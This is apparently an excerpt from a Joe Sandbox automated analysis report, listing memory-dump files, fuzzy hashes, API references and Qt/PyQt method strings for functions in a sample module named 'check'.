Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QWindow$mouseMoveEvent$mouseMoveEvent(self, a0: Optional[QMouseEvent])
API String ID: 2314446140-3381570748
Opcode ID: e1c11dffed50e93b1e0fcd7000ace2a72bdf264e6f7d290572c459218b239f5d
Instruction ID: 1c2e147d669d8076a7310c9ca8c2e3f34ab6fb68d948186e0030685e0530f0ff
Opcode Fuzzy Hash: e1c11dffed50e93b1e0fcd7000ace2a72bdf264e6f7d290572c459218b239f5d
Instruction Fuzzy Hash: 79211072B0DB4686EB50DB15E4542AA77B4FB84BA4F584172DA8D03B74EF3CE845C700

Function 00007FFD86266EC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD86266F5B

Strings

customEvent(self, a0: Optional[QEvent]), xrefs: 00007FFD86266F87
customEvent, xrefs: 00007FFD86266F93
BJ8, xrefs: 00007FFD86266F10
QSyntaxHighlighter, xrefs: 00007FFD86266F9A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QSyntaxHighlighter$customEvent$customEvent(self, a0: Optional[QEvent])
API String ID: 59943102-1016551382
Opcode ID: b9340ddd055dab1b47dcd5622faa44bd8243a6e64edcd8cd15943de03483d326
Instruction ID: 5dffd7c30d50b0536f6bb071180ed145eab5f8f61904b4a93b300dfa670fc116
Opcode Fuzzy Hash: b9340ddd055dab1b47dcd5622faa44bd8243a6e64edcd8cd15943de03483d326
Instruction Fuzzy Hash: 18212E32B0CB46C6EB409B15E8546AA77A4FB94BA4F144172DA8E43764EF3CE845C740

Function 00007FFD86270EA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD86270F3B

Strings

BJ8, xrefs: 00007FFD86270EF0
timerEvent, xrefs: 00007FFD86270F73
QPdfWriter, xrefs: 00007FFD86270F7A
timerEvent(self, a0: Optional[QTimerEvent]), xrefs: 00007FFD86270F67

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QPdfWriter$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
API String ID: 59943102-2210492165
Opcode ID: 514720d75cdd7e71d505234c67888a6d09254fe0b0289589d2b43bb8aa124ec5
Instruction ID: 78fdf25c6c51e23441e0528bd3d91d4ef67f47797347d2ba304d74be081a778b
Opcode Fuzzy Hash: 514720d75cdd7e71d505234c67888a6d09254fe0b0289589d2b43bb8aa124ec5
Instruction Fuzzy Hash: 1D211D7270DB4AC6EA409B15E8646AA77A5FB84BA4F180172EA8D43774EF3CD949C700

Function 00007FFD862B0AA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862B0B3B

Strings

BJ8, xrefs: 00007FFD862B0AF0
QDoubleValidator, xrefs: 00007FFD862B0B7A
childEvent, xrefs: 00007FFD862B0B73
childEvent(self, a0: Optional[QChildEvent]), xrefs: 00007FFD862B0B67

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QDoubleValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
API String ID: 59943102-3183172621
Opcode ID: 91d266c8ee6661e8249d7ead7074c0d1559d0ac96e33ab699ea9f7a0bb8bdfee
Instruction ID: 156b2cff7572918691937da45f8494bf3f207b5fb499209d9c197ee205da5b40
Opcode Fuzzy Hash: 91d266c8ee6661e8249d7ead7074c0d1559d0ac96e33ab699ea9f7a0bb8bdfee
Instruction Fuzzy Hash: EF213D32B0CB46C6EB408B15E8A42AA77B4FB84BA4F584172DA8D13774EF3CE945C700

Function 00007FFD8622AEE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?drawPath@QPaintuser@@UEAAXAEBVQPainterPath@@@Z.QT5GUI ref: 00007FFD8622AF7B

Strings

drawPath, xrefs: 00007FFD8622AFB3
BJ9, xrefs: 00007FFD8622AF30
QPaintEngine, xrefs: 00007FFD8622AFBA
drawPath(self, path: QPainterPath), xrefs: 00007FFD8622AFA7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?drawuser@@PaintPainterPath@Path@@@
String ID: BJ9$QPaintuser$drawPath$drawPath(self, path: QPainterPath)
API String ID: 3259083007-1677864271
Opcode ID: 058f4c36918fd67dbe17a5c6cad690d6cc221c289c143759ea22bb163bc89d1d
Instruction ID: 6865ba384f9fe0da4f03b62781a929fadafe0c6687c96d47336085c8ab862eb8
Opcode Fuzzy Hash: 058f4c36918fd67dbe17a5c6cad690d6cc221c289c143759ea22bb163bc89d1d
Instruction Fuzzy Hash: DB211D7270CB46C6EA409F15E8942AEB7A4FB84BA4F580172DA8D43B74EF3CE845C740

Function 00007FFD8622CF30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?blockRemoved@QTextBlockGroup@@MEAAXAEBVQTextBlock@@@Z.QT5GUI ref: 00007FFD8622CFCB

Strings

blockRemoved(self, block: QTextBlock), xrefs: 00007FFD8622CFF7
BJ9, xrefs: 00007FFD8622CF80
QTextBlockGroup, xrefs: 00007FFD8622D00A
blockRemoved, xrefs: 00007FFD8622D003

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?blockBlockBlock@@@Group@@Removed@
String ID: BJ9$QTextBlockGroup$blockRemoved$blockRemoved(self, block: QTextBlock)
API String ID: 1551954793-2146666574
Opcode ID: 8ac6d368fd590767539e68b409700d713e7dc469c5f4409daacbf74876ee6a2e
Instruction ID: 14da6da4981b041cadb8f82d880ad9c577b8a0c8e23777c8f1c83beaab573df6
Opcode Fuzzy Hash: 8ac6d368fd590767539e68b409700d713e7dc469c5f4409daacbf74876ee6a2e
Instruction Fuzzy Hash: 1A21FD3270CB4686EA409F15E8542AA77A4FB94BA4F540172DE8D43B64EF3CD845C700

Function 00007FFD8629AFB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFD8629B04B

Strings

QRasterWindow, xrefs: 00007FFD8629B08A
BJ8, xrefs: 00007FFD8629B000
moveEvent, xrefs: 00007FFD8629B083
moveEvent(self, a0: Optional[QMoveEvent]), xrefs: 00007FFD8629B077

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QRasterWindow$moveEvent$moveEvent(self, a0: Optional[QMoveEvent])
API String ID: 2314446140-10669103
Opcode ID: a8e1ab428009b38f3b75c59a9f19818785b05e2e1e0f7e7995f2b41091b6d718
Instruction ID: 9e7630efb5eec05c2823f2b058367d9ca61d536f53173e3cab0e70ea0f34190e
Opcode Fuzzy Hash: a8e1ab428009b38f3b75c59a9f19818785b05e2e1e0f7e7995f2b41091b6d718
Instruction Fuzzy Hash: 9D21FB72B0CB46C6EB409B15E8A46AA77A4FB84BA4F140172DA8D43B78EF3CD855C740

Function 00007FFD86230FE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD8623107B

Strings

disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFD862310A7
BJ9, xrefs: 00007FFD86231030
disconnectNotify, xrefs: 00007FFD862310B3
QTextDocument, xrefs: 00007FFD862310BA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QTextDocument$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-941129838
Opcode ID: 130c62990e37d573e07e053c97238a682b4ecb618a734f9cf81fc27c140f15f3
Instruction ID: 582be846e492a37d5c32b6bf5e893b08fefe6232586df45121953d7f0b7fbdc6
Opcode Fuzzy Hash: 130c62990e37d573e07e053c97238a682b4ecb618a734f9cf81fc27c140f15f3
Instruction Fuzzy Hash: 8D212C36B0DB4682EB409B15E9682AA73A4FB85FA4F180172DA8D47774EF3CE855C700

Function 00007FFD86222C80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?blockFormatChanged@QTextBlockGroup@@MEAAXAEBVQTextBlock@@@Z.QT5GUI ref: 00007FFD86222D1B

Strings

QTextList, xrefs: 00007FFD86222D5A
blockFormatChanged(self, block: QTextBlock), xrefs: 00007FFD86222D47
BJ9, xrefs: 00007FFD86222CD0
blockFormatChanged, xrefs: 00007FFD86222D53

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?blockBlockBlock@@@Changed@FormatGroup@@
String ID: BJ9$QTextList$blockFormatChanged$blockFormatChanged(self, block: QTextBlock)
API String ID: 1272908945-592605610
Opcode ID: fd4a4a256bd9e4efb27c1ea6d3ccec71556cd3bd4b1cfbaa8406c3780662eb22
Instruction ID: 6602147969ee5978d8dc7ec454a68d147bc9c90bc007ec3a19bbdccff0da54ae
Opcode Fuzzy Hash: fd4a4a256bd9e4efb27c1ea6d3ccec71556cd3bd4b1cfbaa8406c3780662eb22
Instruction Fuzzy Hash: 67210C32B0DB4686EB009F15E8552AAB7A4FB84BA4F540172DA8D03B74EF3CD845C740

Function 00007FFD86298C70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD86298D0B

Strings

timerEvent(self, a0: Optional[QTimerEvent]), xrefs: 00007FFD86298D37
QRasterWindow, xrefs: 00007FFD86298D4A
BJ8, xrefs: 00007FFD86298CC0
timerEvent, xrefs: 00007FFD86298D43

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

